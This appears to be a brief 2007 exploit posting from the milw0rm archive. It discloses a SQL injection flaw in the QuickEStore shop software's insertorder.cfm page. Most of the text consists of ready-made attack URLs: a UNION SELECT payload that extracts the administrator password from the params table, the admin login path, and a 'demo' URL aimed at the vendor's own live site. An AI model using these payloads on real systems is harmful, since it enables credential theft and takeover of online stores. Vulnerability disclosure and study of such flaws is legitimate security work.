20 lines
No EOL
616 B
Text
20 lines
No EOL
616 B
Text
author:meoconx[at]vnbrain.net
|
|
web application:QuickEStore
|
|
Main Page:www.quickestore.com
|
|
bug:
|
|
|
|
sql injection at insertorder.cfm?CFID=123&CFTOKEN=1'
|
|
|
|
exploit:
|
|
|
|
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]
|
|
|
|
get admin password:
|
|
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
|
|
|
|
link admin:http://www.xxx.com/admin/
|
|
|
|
demo(main site :D :D):
|
|
http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1
|
|
|
|
# milw0rm.com [2007-07-18] |